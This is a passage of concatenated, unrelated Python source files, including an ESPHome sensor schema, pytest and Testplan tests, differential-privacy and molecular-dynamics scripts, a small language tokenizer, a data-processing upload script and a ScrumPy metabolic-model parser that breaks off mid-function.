icon=ICON_MOLECULE_CO2,
accuracy_decimals=0,
device_class=DEVICE_CLASS_CARBON_DIOXIDE,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_TEMPERATURE): sensor.sensor_schema(
unit_of_measurement=UNIT_CELSIUS,
accuracy_decimals=1,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_HUMIDITY): sensor.sensor_schema(
unit_of_measurement=UNIT_PERCENT,
accuracy_decimals=1,
device_class=DEVICE_CLASS_HUMIDITY,
state_class=STATE_CLASS_MEASUREMENT,
),
}
).extend(cv.polling_component_schema("60s"))
async def to_code(config):
var = cg.new_Pvariable(config[CONF_ID])
await cg.register_component(var, config)
pin_clock = await gpio_pin_expression(config[CONF_CLOCK_PIN])
cg.add(var.set_pin_clock(pin_clock))
pin_data = await gpio_pin_expression(config[CONF_DATA_PIN])
cg.add(var.set_pin_data(pin_data))
if CONF_CO2 in config:
sens = await sensor.new_sensor(config[CONF_CO2])
cg.add(var.set_co2_sensor(sens))
if CONF_TEMPERATURE in config:
sens = await sensor.new_sensor(config[CONF_TEMPERATURE])
cg.add(var.set_temperature_sensor(sens))
if CONF_HUMIDITY in config:
sens = await sensor.new_sensor(config[CONF_HUMIDITY])
cg.add(var.set_humidity_sensor(sens))
|
117173
|
import pytest
from basic_shopify_api import Options
def test_options_version():
opts = Options()
opts.version = "unstable"
assert opts.version == "unstable"
def test_options_failed_version():
with pytest.raises(ValueError):
opts = Options()
opts.version = "oops"
def test_options_type():
opts = Options()
# Public test
opts.mode = "public"
assert opts.mode == "public"
assert opts.is_public is True
assert opts.is_private is False
# Private test
opts.mode = "private"
assert opts.mode == "private"
assert opts.is_public is False
assert opts.is_private is True
def test_options_failed_type():
with pytest.raises(ValueError):
opts = Options()
opts.mode = "oops"
|
117198
|
import logging
from testplan import test_plan
from testplan.report import Status
from testplan.report.testing.styles import Style, StyleEnum
from testplan.testing.base import ASSERTION_INDENT
from testplan.testing.multitest import MultiTest, testsuite, testcase
from testplan.testing.multitest.logging import (
CaptureLevel,
LogCaptureMixin,
AutoLogCaptureMixin,
)
@testsuite
class LoggingSuite(LogCaptureMixin):
"""
Demonstrate how logging can added to testcase and possibly captured in the result from test suite.
Add LogCaptureMixin and self.logger will be available for logging. self.capture_log(result) can be
used as a context manager to capture log in the result. It is possible to format the log as needed,
and also to attach the captured log as a file.
The log can be captured at 3 leveles, -TESTSUITE: only the logs logged through self.logger will be captured,
-TESTPLAN: all testplan related loggs captured (so drivers logs will be included as well), -ROOT: all logs
will be captured at the level the root logger is set normally WARNING
"""
@testcase
def testsuite_level(self, env, result):
with self.capture_log(
result
) as logger: # as convenience the logger is returned but is is really the same as
logger.info("Hello")
self.logger.info("Logged as well")
self.logger.parent.info("Not captured")
logging.getLogger().warning("Not captured either")
@testcase
def testplan_level(self, env, result):
with self.capture_log(
result, capture_level=CaptureLevel.TESTPLAN
) as logger:
logger.info("Hello")
self.logger.info("Logged as well")
self.logger.parent.info("Now captured")
logging.getLogger().warning("Not captured either")
@testcase
def root_level(self, env, result):
with self.capture_log(
result, capture_level=CaptureLevel.ROOT
) as logger:
logger.info("Hello")
self.logger.info("Logged as well")
self.logger.parent.info("Now captured")
logging.getLogger().warning("This captured too")
@testcase
def attach(self, env, result):
with self.capture_log(result, attach_log=True) as logger:
logger.info("Attached Log")
@testcase
def format(self, env, result):
with self.capture_log(
result,
format="%(asctime)-24s %(name)-50s %(levelname)-15s %(message)s",
) as logger:
logger.info("Formatted")
@testcase
def multiple(self, env, result):
with self.capture_log(result):
self.logger.info("CaptureGroup 1")
self.logger.error(
"To have some color"
) # This level goes to stdout too
# do an assertion to separate the blocks
result.true(True, "This is so true")
with self.capture_log(result):
self.logger.info("CaptureGroup 2")
self.logger.warning(
"To have some color"
) # This level goes to stdout too
@testcase
def specials(self, env, result):
with self.capture_log(result):
self.logger.test_info("Test info log: goes to the console as well")
self.logger.log_test_status(
"A mandatory check", Status.PASSED, indent=ASSERTION_INDENT
)
@testsuite
class AutoLoggingSuite(AutoLogCaptureMixin):
"""
AutoLogCaptureMixin will automatically add captured log at the end of all testcase
"""
@testcase
def case(self, env, result):
self.logger.info("Hello")
@testcase
def case2(self, env, result):
self.logger.info("Do it for all the testcases")
@testsuite
class AutoLoggingSuiteThatAttach(AutoLogCaptureMixin):
def __init__(self):
super(AutoLoggingSuiteThatAttach, self).__init__()
self.log_capture_config.attach_log = True
@testcase
def case(self, env, result):
self.logger.info("Hello Attached")
@testsuite
class AutoLoggingSuiteThatFormat(AutoLogCaptureMixin):
def __init__(self):
super(AutoLoggingSuiteThatFormat, self).__init__()
self.log_capture_config.format = (
"%(asctime)-24s %(name)-50s %(levelname)-15s %(message)s"
)
@testcase
def case(self, env, result):
self.logger.info("Hello Formatted")
@test_plan(
name="Logging",
pdf_path="report.pdf",
pdf_style=Style(
passing=StyleEnum.ASSERTION_DETAIL, failing=StyleEnum.ASSERTION_DETAIL
),
)
def main(plan):
plan.add(
MultiTest(
name="Logging",
suites=[
LoggingSuite(),
AutoLoggingSuite(),
AutoLoggingSuiteThatAttach(),
AutoLoggingSuiteThatFormat(),
],
)
)
if __name__ == "__main__":
main()
|
117206
|
set_name(0x800A2AB8, "VID_OpenModule__Fv", SN_NOWARN)
set_name(0x800A2B78, "InitScreens__Fv", SN_NOWARN)
set_name(0x800A2C68, "MEM_SetupMem__Fv", SN_NOWARN)
set_name(0x800A2C94, "SetupWorkRam__Fv", SN_NOWARN)
set_name(0x800A2D24, "SYSI_Init__Fv", SN_NOWARN)
set_name(0x800A2E30, "GM_Open__Fv", SN_NOWARN)
set_name(0x800A2E54, "PA_Open__Fv", SN_NOWARN)
set_name(0x800A2E8C, "PAD_Open__Fv", SN_NOWARN)
set_name(0x800A2ED0, "OVR_Open__Fv", SN_NOWARN)
set_name(0x800A2EF0, "SCR_Open__Fv", SN_NOWARN)
set_name(0x800A2F20, "DEC_Open__Fv", SN_NOWARN)
set_name(0x800A3194, "GetVersionString__FPc", SN_NOWARN)
set_name(0x800A3268, "GetWord__FPc", SN_NOWARN)
set_name(0x800A2F44, "StrDate", SN_NOWARN)
set_name(0x800A2F50, "StrTime", SN_NOWARN)
set_name(0x800A2F5C, "Words", SN_NOWARN)
set_name(0x800A3134, "MonDays", SN_NOWARN)
|
117226
|
from autodp.mechanism_zoo import PureDP_Mechanism
from autodp.transformer_zoo import Composition
# Example: pure DP mechanism and composition of it
eps = 0.3
mech = PureDP_Mechanism(eps, name='Laplace')
import matplotlib.pyplot as plt
fpr_list, fnr_list = mech.plot_fDP()
plt.figure(1)
plt.plot(fpr_list,fnr_list,label='fdp_of_laplace')
delta = 1e-6
epslist = [mech.get_approxDP(delta)]
# declare a transformation to handle composition
compose = Composition()
for i in range(2,11):
mech_composed = compose([mech], [i])
epslist.append(mech_composed.get_approxDP(delta))
fpr_list, fnr_list = mech_composed.plot_fDP()
plt.plot(fpr_list, fnr_list, label='fdp_of_'+str(i)+'laplace')
plt.legend()
plt.xlabel('Type I error')
plt.ylabel('Type II error')
plt.show()
# we could specify parameters of the composition, e.g. using RDP composition, using KOV and so on
plt.figure(2)
plt.plot(range(1,11),epslist)
plt.xlabel('number of times compose')
plt.ylabel(r'$\epsilon$ at $\delta = 1e-6$')
plt.show()
|
117244
|
import torch
def sample_laplace_noise(loc, scale, shape, dtype, device):
'''
https://github.com/pytorch/pytorch/blob/6911ce19d7fcf06e7af241e6494b23acdc320dc4/torch/distributions/laplace.py
'''
finfo = torch.finfo(dtype)
u = torch.zeros(shape, dtype=dtype, device=device).uniform_(finfo.eps - 1, 1)
return loc - scale * u.sign() * torch.log1p(-u.abs())
def sample_unit_laplace_noise(shape, dtype, device):
return sample_laplace_noise(0., 1., shape, dtype, device)
|
117270
|
import numpy as np
import time
import md_simple
import md_nnps
from compyle.config import get_config
def solve(n, backend, solver_algo, tf=0.5, dt=0.02, use_count_sort=False):
solver = solver_algo(n, backend=backend.replace("_omp", ""))
start = time.time()
solver.solve(tf, dt)
end = time.time()
print("Time taken for backend = %s, N = %i is %g secs" %
(backend, n, (end - start)))
return end - start
def compare(backends, n_list, solver_algo, niter=3):
t_list = {b: [] for b in backends}
speedups = {b: [] for b in backends}
for n in n_list:
print("Running for N = %i" % n)
for backend in backends:
if "omp" in backend:
get_config().use_openmp = True
t = 1e9
for it in range(niter):
t = min(t, solve(n, backend, solver_algo))
t_list[backend].append(t)
if "omp" in backend:
get_config().use_openmp = False
if 'cython' in backends:
for backend in backends:
for i, n in enumerate(n_list):
speedups[backend].append(
t_list["cython"][i] / t_list[backend][i])
else:
speedups = None
return speedups, t_list
def compare_implementations(backend, n_list, niter=3):
import matplotlib.pyplot as plt
sp, nnps_tlist = compare([backend], n_list,
md_nnps.MDSolver, niter=niter)
sp, simple_tlist = compare([backend], n_list,
md_simple.MDSolver, niter=niter)
speedup = [simple_tlist[backend][i] / nnps_tlist[backend][i]
for i in range(len(n_list))]
plt.loglog(n_list, nnps_tlist[backend], 'x-', label="Linear")
plt.loglog(n_list, simple_tlist[backend], 'x-', label="Simple")
plt.xlabel("Number of particles")
plt.ylabel("Time (secs)")
plt.legend()
plt.grid(True)
plt.savefig("time_comp_impl.png", dpi=300)
plt.clf()
plt.loglog(n_list, speedup, 'x-')
plt.xlabel("Number of particles")
plt.ylabel("Speedup")
plt.grid(True)
plt.savefig("speedup_comp_impl.png", dpi=300)
def plot(n_list, speedups, t_list, label):
backend_label_map = {'cython': 'Cython', 'cython_omp': 'OpenMP',
'opencl': 'OpenCL', 'cuda': 'CUDA'}
import matplotlib.pyplot as plt
plt.figure()
if speedups:
for backend, arr in speedups.items():
if backend == "cython":
continue
plt.semilogx(n_list, arr, 'x-', label=backend_label_map[backend])
plt.xlabel("Number of particles")
plt.ylabel("Speedup")
plt.legend()
plt.grid(True)
plt.savefig("%s_speedup_%s.png" %
(label, "_".join(speedups.keys())), dpi=300)
plt.clf()
for backend, arr in t_list.items():
plt.loglog(n_list, arr, 'x-', label=backend_label_map[backend])
plt.xlabel("Number of particles")
plt.ylabel("Time (secs)")
plt.legend()
plt.grid(True)
plt.savefig("%s_time_%s.png" % (label, "_".join(t_list.keys())), dpi=300)
if __name__ == "__main__":
from argparse import ArgumentParser
p = ArgumentParser()
p.add_argument(
'-c', '--comparison', action='store', dest='comp', default='gpu_comp',
choices=['gpu_comp', 'omp_comp', 'comp_algo'],
help='Choose the comparison.'
)
p.add_argument(
'--nnps', action='store', dest='nnps', default='linear',
choices=['linear', 'simple'],
help='Choose algorithm.'
)
p.add_argument(
'--use-double', action='store_true', dest='use_double',
default=False, help='Use double precision on the GPU.'
)
o = p.parse_args()
get_config().use_double = o.use_double
solver_algo = (md_nnps.MDNNPSSolver if o.nnps == 'linear'
else md_simple.MDSolver)
n_list = [10000 * (2 ** i) for i in range(10)] if o.nnps == 'linear' else \
[500 * (2 ** i) for i in range(8)]
if o.comp == "gpu_comp":
backends = ["opencl", "cuda", "cython"]
print("Running for", n_list)
speedups, t_list = compare(backends, n_list, solver_algo)
plot(n_list, speedups, t_list, o.nnps)
elif o.comp == "omp_comp":
backends = ["cython_omp", "cython"]
print("Running for", n_list)
speedups, t_list = compare(backends, n_list, solver_algo)
plot(n_list, speedups, t_list, o.nnps)
elif o.comp == "comp_algo":
backend = "cython"
n_list = [500, 1000, 2000, 4000, 8000, 16000, 32000]
print("Running for", n_list)
compare_implementations(backend, n_list)
|
117271
|
import pytest
from decimal import Decimal
from importer.page_importer import PageImporter
from pages.event_page.models import EventPage
import pages.event_page.fixtures as fixtures
from pages.event_page.factories import EventPageFactory
import pages.event_page.fixtures.helpers.components as components
@pytest.mark.django_db
def test_create_event_page_with_title():
page = fixtures.title()
assert isinstance(page, EventPage)
assert page.title == "Event page with title"
assert page.slug == "Event-page-with-title"
# If Event page has janis url
@pytest.mark.django_db
def test_event_page_with_urls(home_page, expected_publish_url_base):
janis_url_page_type = 'event'
page = EventPageFactory.create(
slug="page_slug",
coa_global=False,
parent=home_page,
date="2020-9-29"
)
# Set expected urls using janis url page type and Event page year, month, day and slug
expected_urls = ['/{page_type}/{page_year}/{page_month}/{page_day}/{page_slug}'.format(
page_type=janis_url_page_type,
page_year=page.date.year,
page_month=page.date.month,
page_day=page.date.day,
page_slug=page.slug)]
urls = page.janis_urls()
janis_publish_url = page.janis_publish_url()
# we should get a url under every Event
assert urls == expected_urls
assert janis_publish_url == f'{expected_publish_url_base}{expected_urls[0]}'
# If Event page has only a title
# it should have no urls
@pytest.mark.django_db
def test_event_page_with_no_urls():
page = fixtures.title()
urls = page.janis_urls()
janis_publish_url = page.janis_publish_url()
assert urls == []
assert janis_publish_url == '#'
@pytest.mark.django_db
def test_create_event_page_with_city_location():
page = fixtures.at_city_location()
assert isinstance(page, EventPage)
assert page.title == "Event at city location"
assert page.slug == "event-at-city-location"
# Add autogenerated streamfield "id" to expected value
expected_location_blocks = components.city_location_block()
expected_location_blocks[0]["id"] = page.location_blocks.stream_data[0]["id"]
assert page.location_blocks.stream_data == expected_location_blocks
# @pytest.mark.django_db
@pytest.mark.skip("importer test")
def test_import_event_page_with_city_location(remote_staging_preview_url, test_api_url, test_api_jwt_token):
url = f'{remote_staging_preview_url}/event/UGFnZVJldmlzaW9uTm9kZTo0NA==?CMS_API={test_api_url}'
page = PageImporter(url, test_api_jwt_token).fetch_page_data().create_page()
assert isinstance(page, EventPage)
assert type(page.location_blocks.stream_data[0]['value']['location_page']) == int
@pytest.mark.django_db
def test_create_event_page_with_remote_location():
page = fixtures.at_remote_location()
assert isinstance(page, EventPage)
assert page.title == "Event at remote location"
assert page.slug == "event-at-remote-location"
# Add autogenerated streamfield "id" to expected value
expected_location_blocks = components.remote_location_block()
expected_location_blocks[0]["id"] = page.location_blocks.stream_data[0]["id"]
assert page.location_blocks.stream_data == expected_location_blocks
# @pytest.mark.django_db
@pytest.mark.skip("importer test")
def test_import_event_page_with_remote_location(remote_staging_preview_url, test_api_url, test_api_jwt_token):
url = f'{remote_staging_preview_url}/event/UGFnZVJldmlzaW9uTm9kZTo0Ng==?CMS_API={test_api_url}'
page = PageImporter(url, test_api_jwt_token).fetch_page_data().create_page()
assert isinstance(page, EventPage)
# Remove autogenerated "id" to see if the rest of stream_data matches
del page.location_blocks.stream_data[0]["id"]
assert page.location_blocks.stream_data == [{
'type': 'remote_location',
'value': {
'additional_details_ar': '',
'additional_details_en': '3rd floor conference room',
'additional_details_es': '',
'additional_details_vi': '',
'city': 'Austin',
'name_ar': '',
'name_en': 'Faulk',
'name_es': '',
'name_vi': '',
'state': 'TX',
'street': '800 Guadalupe',
'unit': '5',
'zip': '78701'
}
}]
@pytest.mark.django_db
def test_create_event_page_with_fees():
page = fixtures.three_fees()
assert isinstance(page, EventPage)
assert page.title == "Event with fees"
assert page.slug == "event-with-fees"
# Add autogenerated streamfield "id" to expected value
expected_fees = components.three_fees
for expected_fee in expected_fees:
actual_fee = page.fees.get(fee_label=expected_fee['fee_label'])
assert actual_fee.fee_label == expected_fee['fee_label']
assert actual_fee.fee == Decimal(expected_fee['fee'])
@pytest.mark.skip("importer test")
def test_import_event_page_with_fees(remote_staging_preview_url, test_api_url, test_api_jwt_token):
url = f'{remote_staging_preview_url}/event/UGFnZVJldmlzaW9uTm9kZTo3Nw==?CMS_API={test_api_url}'
page = PageImporter(url, test_api_jwt_token).fetch_page_data().create_page()
assert isinstance(page, EventPage)
expected_fees = components.three_fees
for expected_fee in expected_fees:
actual_fee = page.fees.get(fee_label=expected_fee['fee_label'])
assert actual_fee.fee_label == expected_fee['fee_label']
assert actual_fee.fee == Decimal(expected_fee['fee'])
|
117291
|
from .utils import default_init_weights
from .cost_volume import compute_cost_volume, add_H_W_Padding
from .weightnet import WeightNet, WeightNet_DW
from .frn import FilterResponseNorm2d
from .bam import BAM
from .coordi_attention import CoordAtt
from .shuffle import ShuffleV2Block
from .net import MobileNeXt
from .net import ResBlocks
|
117294
|
from leapp.models import Model, fields
from leapp.topics import SystemInfoTopic
class NtpMigrationDecision(Model):
topic = SystemInfoTopic
migrate_services = fields.List(fields.String())
config_tgz64 = fields.String()
|
117305
|
from json import load, dumps
from .utils import populate_ast
class TokenStream(object):
def __init__(self, input_):
self.input = input_
self.current = None
self.keywords = 'if then else true false'.split()
self.datatypes = ['U0', 'U8', 'U16', 'U32', 'U64',
'I8', 'I16', 'I32', 'I64', 'F64']
self.tokens = list()
self.direct_trans = {
'Print': 'printf',
'U0': 'void',
'U8': 'unsigned char',
'U16': 'unsigned short',
'U32': 'unsigned int',
'U64': 'unsigned long',
'I8': 'char',
'I16': 'short',
'I32': 'int',
'I64': 'long',
'F64': 'double'
}
def croak(self, message):
return self.input.croak(message + f'{dumps(self.tokens, indent=2)}')
def is_keyword(self, word):
return word in self.keywords
def is_datatype(self, word):
return word in self.datatypes
def is_digit(self, ch):
try:
int(ch)
return True
except (ValueError, TypeError):
return False
def is_id_start(self, ch):
try:
return ch.isalpha()
except AttributeError:
return False
def is_id(self, ch):
return self.is_id_start(ch) or ch in '?!-<>=0123456789'
def is_op_char(self, ch):
return ch in '+-*/%=&|<>!'
def is_punc(self, ch):
return ch in ',;(){}[]'
def is_whitespace(self, ch):
return ch in ' _\t_\n'.split('_')
def is_being_declared(self):
return self.tokens and self.tokens[-1].get('type') != 'datatype'
def is_not_builtin(self, id_):
return id_ not in self.direct_trans
def read_while(self, predicate):
string = str()
while not self.input.eof() and predicate(self.input.peek()):
string += self.input.next()
return string
def read_while_prev(self, predicate):
string = str()
line = self.input.line
col = self.input.col
while not self.input.bof() and predicate(self.input.peek_prev()):
string += self.input.prev()
self.input.line = line
self.input.col = col
return string[::-1]
def read_number(self):
has_dot = False
def anon(ch, has_dot):
if ch == '.':
if (has_dot):
return False
has_dot = True
return True
return self.is_digit(ch)
number = self.read_while(lambda ch: anon(ch, has_dot))
try:
number = int(number)
except ValueError:
number = float(number)
self.tokens.append({
'type': 'num',
'value': number
})
return self.tokens[-1]
def read_function(self, name, prog, type_=['int']):
coord = f'{self.input.filename}:{self.input.line}'
return populate_ast(self, 'funcdef', **{
'coord': coord,
'body.coord': coord,
'body.block_items': prog,
'decl.name': name,
'decl.coord': coord,
'decl.type.coord': coord,
'decl.type.type.coord': coord,
'decl.type.type.declname': name,
'decl.type.type.type.names': type_,
'decl.type.type.type.coord': coord
})
def read_ident(self):
coord = f'{self.input.filename}:{self.input.line}'
id_ = self.read_while(self.is_id)
type_ = str()
# print(f'id: {id_}')
if self.is_keyword(id_):
type_ = 'kw'
elif self.is_datatype(id_):
type_ = 'datatype'
self.direct_trans[f'{id_}*'] = f'{self.direct_trans[id_]}*'
maybe_pointer = self.read_while(lambda ch: ch in [' ', '*'])\
.replace(' ', str())
if maybe_pointer:
id_ += maybe_pointer
elif self.is_being_declared() and self.is_not_builtin(id_):
# print(f"creating var out of {id_}")
return populate_ast(self, 'id', **{
'name': id_,
'coord': coord
})
else:
# function definition
if self.tokens and self.tokens[-1].get('type') == 'datatype' and\
self.peek()['value'] == '(':
return self.read_function(id_, list())
# function call
if self.peek()['value'] == '(':
return populate_ast(self, 'funccall', **{
'coord': coord,
'name.name': self.direct_trans.get(id_, id_),
'name.coord': coord,
'args.coord': coord,
'args.exprs.coord': coord
})
# function/variable declaration
return populate_ast(self, 'decl', **{
'name': id_,
'coord': coord,
'type.declname': id_,
'type.coord': coord,
'type.type.names': list(),
'type.type.coord': coord,
'init.coord': coord
})
self.tokens.append({
'type': type_,
'value': self.direct_trans.get(id_, id_)
})
return self.tokens[-1]
def read_escaped(self, end):
escaped = False
string = str()
self.input.next()
while not self.input.eof():
ch = self.input.next()
if ch == end:
break
string += ch
# if escaped:
# string += ch
# escaped = False
# elif ch == '\\':
# escaped = True
# elif ch == end:
# break
# else:
# string += ch
return f'"{string}"'
def read_string(self):
self.tokens.append({
"_nodetype": "Constant",
"type": "string",
"value": self.read_escaped('"'),
"coord": "examples/math.c:3:16"
})
# print(f'found string: {self.tokens[-1]}')
# self.tokens.append({
# 'type': 'str',
# 'value': self.read_escaped('"')
# })
return self.tokens[-1]
def skip_comment(self):
self.read_while(lambda ch: ch != "\n")
self.input.next()
def read_next(self):
self.read_while(self.is_whitespace)
if self.input.eof():
return None
ch = self.input.peek()
if ch == "//":
self.skip_comment()
return self.read_next()
if ch == '"':
return self.read_string()
if self.is_digit(ch):
return self.read_number()
if self.is_id_start(ch):
return self.read_ident()
if self.is_punc(ch):
self.tokens.append({
'type': 'punc',
'value': self.input.next()
})
return self.tokens[-1]
if self.is_op_char(ch):
self.tokens.append({
'type': 'op',
'value': self.read_while(self.is_op_char)
})
return self.tokens[-1]
self.input.croak(f'Can\'t handle character: {ch}')
def read_prev(self):
self.read_while_prev(self.is_whitespace)
if self.input.bof():
return None
ch = self.input.peek()
if ch == "//":
self.skip_comment()
return self.read_next()
if ch == '"':
return self.read_string()
if self.is_digit(ch):
return self.read_number()
if self.is_id_start(ch):
return self.read_ident()
if self.is_punc(ch):
self.tokens.append({
'type': 'punc',
'value': self.input.next()
})
return self.tokens
if self.is_op_char(ch):
self.tokens.append({
'type': 'op',
'value': self.read_while(self.is_op_char)
})
return self.tokens[-1]
self.input.croak(f'Can\'t handle character: {ch}')
def peek(self):
if self.current:
return self.current
self.current = self.read_next()
return self.current
def next(self):
tok = self.current
self.current = None
return tok or self.read_next()
def prev(self):
return self.read_prev()
def eof(self):
return self.peek() is None
|
117309
|
from collections import deque
d = deque()
N = int(input())
for _ in range(N):
cmd = input().split()
if cmd[0] == 'append':
d.append(cmd[1])
elif cmd[0] == 'appendleft':
d.appendleft(cmd[1])
elif cmd[0] == 'pop':
d.pop()
elif cmd[0] == 'popleft':
d.popleft()
print(' '.join(d))
|
117316
|
from daiquiri.core.utils import send_mail, get_admin_emails, get_permission_emails
def get_manager_emails():
return get_permission_emails((
'daiquiri_meetings.view_meeting',
'daiquiri_meetings.view_participant',
'daiquiri_meetings.view_contribution',
)) + get_admin_emails()
def send_registration_mails(request, meeting, participant, contribution=None):
# sends an email to the admins once a user was activated.
send_mail(request, 'meetings/email/notify_registration', {
'meeting': meeting,
'participant': participant,
'contribution': contribution
}, get_manager_emails())
# sends an email to the once he/she was activated.
send_mail(request, 'meetings/email/registration', {
'meeting': meeting,
'participant': participant,
'contribution': contribution
}, [participant.email])
|
117372
|
import pandas as pd
import os
import sys
import datetime
utils_path = os.path.join(os.path.abspath(os.getenv('PROCESSING_DIR')),'utils')
if utils_path not in sys.path:
sys.path.append(utils_path)
import util_files
import util_cloud
import util_carto
import logging
from zipfile import ZipFile
import tabula
# Set up logging
# Get the top-level logger object
logger = logging.getLogger()
for handler in logger.handlers: logger.removeHandler(handler)
logger.setLevel(logging.INFO)
# make it print to the console.
console = logging.StreamHandler()
logger.addHandler(console)
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# name of table on Carto where you want to upload data
# this should be a table name that is not currently in use
dataset_name = 'soc_067_rw1_climate_risk_index' #check
logger.info('Executing script for dataset: ' + dataset_name)
# create a new sub-directory within your specified dir called 'data'
# within this directory, create files to store raw and processed data
data_dir = util_files.prep_dirs(dataset_name)
'''
Download data and save to your data directory
'''
# insert the url used to download the pdf from the source website
url = 'https://germanwatch.org/sites/germanwatch.org/files/20-2-01e%20Global%20Climate%20Risk%20Index%202020_14.pdf'
# download the pdf from the url, scrape the tables that store the data,
# and combine them into a single pandas dataframe
df = pd.concat(tabula.read_pdf(url, pages=list(range(37, 41)), multiple_tables=True, lattice=True)[:-1])
# export the pandas dataframe to a csv file
raw_data_file = os.path.join(data_dir, 'data.csv')
df.to_csv(raw_data_file, index = False)
'''
Process data
'''
# rename the columns to get rid of spaces and special characters
# and convert them all to lowercase letters
df.rename(columns = {'CRI\rRank': 'cri_rank',
'Country': 'country',
'CRI\rscore': 'cri_score',
'Fatalities\rin 2018\r(Rank)': 'fatalities_2018_rank',
'Fatalities per\r100 000 inhab-\ritants (Rank)': 'fatalities_per_100k',
'Losses in mil-\rlion US$ (PPP)\r(Rank)': 'losses_usdm_ppp_rank',
'Losses per\runit GDP in\r% (Rank)': 'losses_per_gdp__rank'},
inplace = True)
# create a new column 'datetime' to store the time period of the data
# as the first date of the year
df['datetime'] = datetime.datetime(2018, 1, 1)
# save processed dataset to csv
processed_data_file = os.path.join(data_dir, dataset_name+'_edit.csv')
df.to_csv(processed_data_file, index=False)
'''
Upload processed data to Carto
'''
logger.info('Uploading processed data to Carto.')
util_carto.upload_to_carto(processed_data_file, 'LINK')
'''
Upload original data and processed data to Amazon S3 storage
'''
# initialize AWS variables
aws_bucket = 'wri-public-data'
s3_prefix = 'resourcewatch/'
logger.info('Uploading original data to S3.')
# Upload raw data file to S3
# Copy the raw data into a zipped file to upload to S3
raw_data_dir = os.path.join(data_dir, dataset_name+'.zip')
with ZipFile(raw_data_dir,'w') as zip:
zip.write(raw_data_file, os.path.basename(raw_data_file))
# Upload raw data file to S3
uploaded = util_cloud.aws_upload(raw_data_dir, aws_bucket, s3_prefix+os.path.basename(raw_data_dir))
logger.info('Uploading processed data to S3.')
# Copy the processed data into a zipped file to upload to S3
processed_data_dir = os.path.join(data_dir, dataset_name+'_edit.zip')
with ZipFile(processed_data_dir,'w') as zip:
zip.write(processed_data_file, os.path.basename(processed_data_file))
# Upload processed data file to S3
uploaded = util_cloud.aws_upload(processed_data_dir, aws_bucket, s3_prefix+os.path.basename(processed_data_dir))
|
117454
|
from __future__ import print_function
import click
import json
import os
import cobra
import re
from gsmodutils.utils import StringIO
class ParseError(Exception):
pass
def load_scrumpy_model(filepath_or_string, name=None, model_id=None, media=None, objective_reactions=None,
obj_dir='min', fixed_fluxes=None):
"""
Specify a base scrumpy structural model file and returns a cobra model.
This hasn't be thoroughly tested so expect there to be bugs
To get a solution from the returned object you need to specify nice stuff like the atpase reaction and media
:param filepath_or_string: filepath or scrumpy string
:param name:
:param model_id:
:param media:
:param objective_reactions:
:param obj_dir:
:param fixed_fluxes:
:return:
"""
if objective_reactions is None:
objective_reactions = ['Biomass']
if fixed_fluxes is not None:
assert isinstance(fixed_fluxes, dict)
if os.path.isfile(filepath_or_string):
rel_path = '/'.join(os.path.abspath(filepath_or_string).split('/')[:-1])
fp = os.path.abspath(filepath_or_string).split('/')[-1]
reactions, metabolites, externals = parse_file(fp, rel_path=rel_path)
else:
rel_path = '.'
reactions, metabolites, externals = parse_string(filepath_or_string, rel_path=rel_path)
model = cobra.Model()
for mid in metabolites:
compartment = 'e'
if mid[:2] == "x_" or mid in externals:
compartment = 'e'
m = cobra.Metabolite(id=mid, compartment=compartment) # ScrumPy does not use compartments
model.add_metabolites([m])
added_reactions = []
for reaction in reactions:
if reaction['id'] not in added_reactions:
r = cobra.Reaction(reaction['id'])
model.add_reactions([r])
r.lower_bound = reaction['bounds'][0]
r.upper_bound = reaction['bounds'][1]
r.add_metabolites(reaction['metabolites'])
added_reactions.append(reaction['id'])
# We need to add transporters for external metabolites not defined with the "External" directive
for metabolite in model.metabolites:
if metabolite.id[:2] == "x_":
r = cobra.Reaction("EX_{}".format(metabolite.id[2:]))
model.add_reactions([r])
r.lower_bound = -1000.0
r.upper_bound = 1000.0
r.add_metabolites({
metabolite.id: -1.0
})
added_reactions.append(r.id)
if media is not None:
for ex_reaction in model.exchanges:
ex_reaction.lower_bound = media.get(ex_reaction.id, 0)
if fixed_fluxes is not None:
for rid, flux in fixed_fluxes.items():
try:
reaction = model.reactions.get_by_id(rid)
reaction.lower_bound = flux
reaction.upper_bound = flux
except KeyError:
click.echo('Error setting fixed flux for reaction id {}, not found'.format(rid))
for oreact in objective_reactions:
try:
objreac = model.reactions.get_by_id(oreact)
objreac.objective_coefficient = 1.0
except KeyError:
print('Error setting objective, reaction name {} not found'.format(oreact))
model.objective.direction = obj_dir
model.id = model_id
model.name = name
return model
def get_tokens(line):
"""
Goes through each charachter in scrumpy file attempting to find tokens
FIXME: if there is a numeric after a direction token this fails
e.g. '->2 "PROTON"' fails but '-> 2 "PROTON"' works
:param line_dt:
:return:
"""
line_dt = line.strip().split('#')[0]
tokens = []
quoted = False
tk_str = ""
line_dt = line_dt.replace("->", "-> ")
line_dt = line_dt.replace("<-", "<- ")
line_dt = line_dt.replace("<>", "<> ")
for ch in line_dt:
if ch in ['"', "'"]:
if not quoted:
quoted = True
if len(tk_str) and ch != " ":
tokens.append(tk_str)
tk_str = ch
elif tk_str[0] == ch:
tk_str += ch
tokens.append(tk_str)
tk_str = ""
quoted = False
else:
tk_str += ch
elif ch in ["(", ")", ":", ",", " "] and not quoted:
if len(tk_str):
tokens.append(tk_str)
tk_str = ""
if ch != " ":
tokens.append(ch)
else:
tk_str += ch
if len(tk_str):
tokens.append(tk_str)
return tokens
def parse_file(filepath, fp_stack=None, rel_path=''):
"""
Recursive function - takes in a scrumpy spy file and parses it, returning a set of reactions
Note this code is not fully tested. Expect some bugs.
:param filepath:
:param fp_stack:
:param rel_path:
:return:
"""
if fp_stack is None:
fp_stack = [filepath]
else:
fp_stack.append(filepath)
with open(os.path.join(rel_path, filepath)) as infile:
reactions, metabolites, externals = parse_fobj(infile, fp_stack, rel_path, filepath)
return reactions, metabolites, externals
def parse_string(spy_string, rel_path='.'):
with StringIO() as fstr:
fstr.write(spy_string)
fstr.seek(0)
reactions, metabolites, externals = parse_fobj(fstr, [], rel_path, "scrumpy_string")
return reactions, metabolites, externals
def parse_fobj(infile, fp_stack, rel_path, source_name):
num_match = re.compile("[0-9]*/[0-9]*")
reactions = []
metabolites = []
externals = []
in_include = False
in_external = False
in_reaction = False
s_coef = -1
si = 1.0
for linecount, line in enumerate(infile):
# Ignore anything after comments
